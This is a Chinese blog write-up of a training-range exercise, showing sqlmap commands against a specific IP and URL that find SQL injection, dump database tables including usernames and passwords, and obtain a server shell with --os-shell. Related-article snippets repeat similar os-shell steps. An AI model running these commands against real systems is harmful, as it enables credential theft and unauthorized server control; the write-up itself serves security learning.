WriteUp:Kali渗透 - 通过Sqlmap直接获得服务器权限

最新推荐文章于 2024-05-15 23:05:04 发布
最新推荐文章于 2024-05-15 23:05:04 发布
阅读量1k 收藏 8
点赞数 1
分类专栏: 网络安全学习 文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/119783967
版权

靶场链接:https://hack.zkaq.cn/battle/target?id=aabe6f2bda75107c

使用sqlmap进行渗透测试

  • 找到可能存在注入点的网站,http://59.63.200.79:6453/single.php?id=1放到sqlmap上跑: sqlmap -u "http://59.63.200.79:6453/single.php?id=1" 发现三个SQL漏洞:
    在这里插入图片描述

  • 爆库:sqlmap -u "http://59.63.200.79:6453/single.php?id=1" --dbs

  • 爆表:sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake --tables --batch

  • 爆字段:sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake -T user --columns --batch

  • 爆值:sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake -T user -C username --dump --batch sqlmap -u "http://59.63.200.79:6453/single.php?id=1" -D cake -T user -C passwd --dump --batch

  • 获取服务器权限:sqlmap -u "http://59.63.200.79:6453/single.php?id=1" --os-shell
    在这里插入图片描述
    在这里插入图片描述
    是PHP,输入4在这里插入图片描述

  • 为所欲为

Zeker62
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqlmap mysql shell_利用SQLmap服务器shell
weixin_39528525的博客
01-27 2322
1、简介sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是:1)基于布尔的盲注...
sql注入与sqlmap全详细
qq_41620273的博客
12-25 3466
sql注入与sqlmap SQL注入危害: SQL注入分类: 1.基于注入点分类:get注入、post注入、cookie注入 2.基于变量数据类型: 字符型、数字型注入 3.基于获取数据类型方法: 基于回显(查询结果直接显现)、基于错误(由于配置的原因,包错日志原本因该打印到日志文件夹中,却直接输出到了网页页面上来了)、盲注(布尔盲注、时间盲注) 数字型: 布尔盲注: 在id=1后拼接 and 1=1或者 and 1=2; 判断是true或者false 时间盲注:在id=1后拼接
SQL注入之SQLmap入门
IT-Blog
01-09 2200
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了。现在支持python3了 基本参数 is-dba 当前用户权限 dbs 所有数据库 current-db 当前数据库 users 所有用户 current-user 当前用户 --tables ...
Kali渗透 - 通过Sqlmap直接获得服务器权限
最新发布
shierbai的博客
05-15 208
博主也是第一次用这命令,这真爽啊。参数--os-shell。这关就是拿来学命令的。
SQLmap注入获取Webshell及系统权限研究.pdf
06-08
SQLmap注入获取Webshell及系统权限研究
sqlmap提权
m0_51822230的博客
05-17 4313
mysql提权 一.os-shell提权 建立os-shell前提条件: ①必须要有dba权限 ②secure_file_priv必须为空,不然无法写入文件 这是secure_file_priv为null的情况下 这是secure_file_priv为空的情况下 ③知道网站的绝对路径 1、首先查看当前用户权限,是dba后进行os-shell建立 2、sqlmap -u “http://192.168.43.194/sqli/Less-1/?id=1” --os-shell 在这里选择网页语言,根据网页
利用SQLmap服务器shell
weixin_33834628的博客
07-25 1355
1、简介 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQ...
leetcode不会-LC-Writeup:LC-Writeup
06-30
不会LC-Writeup 问题:未交叉的线, 方法:自顶向下的动态规划 直觉: 让A和B成为我们的两个整数数组。 假设我们想在子数组A[0...i]和B[0...j] (包括两端)中找到最大数量的未交叉线。 如果子数组共享相同的最后一...
Long-Long-Encrypt-Writeup:2021CTFSGCTF编写-长长加密
03-14
正如我们可以从txt.enc文件中获得n,e,c一样,我想这是一种类似于RSA的加密方法。 加密在这里:'''def is_prime(n):#在这里实现一些素数检查功能,返回True#占位符 def bti(s):out = 0 for i in s:out =...
wani-writeup:大阪大学CTF团队Wani Hackase提供的CTF解决方案
04-30
Wani Hackase撰写 大阪大学CTF团队Wani Hackase提供的CTF解决方案 这是大阪大学CTF团队Wani Hackase的写存储区。 如何使用 /YYYY/MM-eventName/problemFormat-problemName/README.md # Example ...
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone ...cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 ... 面向返
sctf2018-zhuanxv:SCTF2018-Zhuanxv Docker(源码)&Writeup
05-11
sctf2018-zhuanxv 部署 启动 ./start_up.sh 停止 docker-compose down WP 第一步:信息收集 信息收集,发现github上遗留的说明。...第二步:下载源码 查看网页源代码,发现背景图片的加载方式使用./loadimage?...
使用KALI下的sqlmap来隐藏渗透SQL服务器 (ABPET)
我不是猫叔
09-09 756
今天我将演示攻击者如何使用SQL注入攻击MySQL数据库并对其进行攻击。SQL注入攻击使攻击者能够获取数据库信息(如用户名和密码),并可能危及在数据库上中继的网站和Web应用程序。 保持SQL数据库的安全是非常重要的,因为它们通常可以保存有关网站和Web应用程序及其配置的敏感信息。MySQL数据库还可以保存重要的客户端和用户信息,如用户名、密码和银行信息。(ABPET 项目) 什么是SQL注入?...
sqlmap注入mysql_sqlmapmysql root权限注入点
weixin_31282885的博客
01-19 517
遇到一mysql root权限注入点,尝试用sqlmap进一步渗透获取更高权限,具体如下:判断注入点的当前用户和当前数据库./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1"...
内网渗透(一):获得权限
热门推荐
sid10t.
05-01 2万+
文章目录前言实战准备攻击后记 前言 本博文仅供学习使用,请勿他用!!! 网络安全成为当下最热门的话题,如何维护网络安全是关键,而内网渗透测试又是其中最重要的部分,接下来博主将会通过系列文章,对内网渗透进行介绍与复现; 本文将会介绍如何获取一个系统的权限;   实战 准备 打开两个虚拟机,这里我用的是 kali 和 windows7,kali 作为攻击机,那么 windows7 就作为肉鸡; 查看两台机子的 IP: Kali IP Windows7 IP ping 一下,可以连通,那就开始攻击准
web攻防实战writeup;sqlmap使用&sql注入&敏感文件扫描&SSFR漏洞BurpSuite使用
CHERRY_cong的博客
05-15 502
web攻防实战writeup;sql注入&敏感文件扫描&SSFR漏洞BurpSuite使用 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录web攻防实战writeup;sql注入&敏感文件扫描&SSFR漏洞BurpSuite使用step1:扫描数据库step2:列出数据库的表step3:将表中数据输出step4: sql命令注入web2step1 敏感文件扫描step2 恢复文件查看源码step3 上传webshellweb3step1:确定发送
Kali渗透基础》10. 提权、后渗透
学习学习学习......
07-23 799
提权、Admin 提权为 System、抓包嗅探、键盘记录、本地缓存密码(PwDump,WCE,fgdump,Mimikatz)、利用漏洞提权、利用配置不当提权(icacls,find)、信息与数据收集、痕迹隐藏。
web安全渗透之钓鱼网站提权
kali_Ma的博客
11-12 4390
要生成一个钓鱼网址链接,诱导用户点击,实验过程是让win7去点击这个钓鱼网站链接,则会自动打开一个文件共享服务器的文件夹,在这个文件夹里面会有两个文件,当用户分别点击执行后,则会主动连接到发起攻击的主机上,即可攻击成功:攻击成功后,想要从kali上传文件到win7中,后发现权限不够的问题,则进行提权操作,后成功上传文件win7和kaliKali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全
2020 YCBCTF羊城杯官方Writeup:PHP与Web安全解题技巧实录
- 解题步骤:利用`eavlpostcmd`命令执行一句话木马,通过Base64编码解析获取的文件内容,将缺失的头部补全后解码为图片,找到flag。 2. PHP相关挑战: - Easyser: - 知识点:PHP基础代码审计和序列化绕过 - 解题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值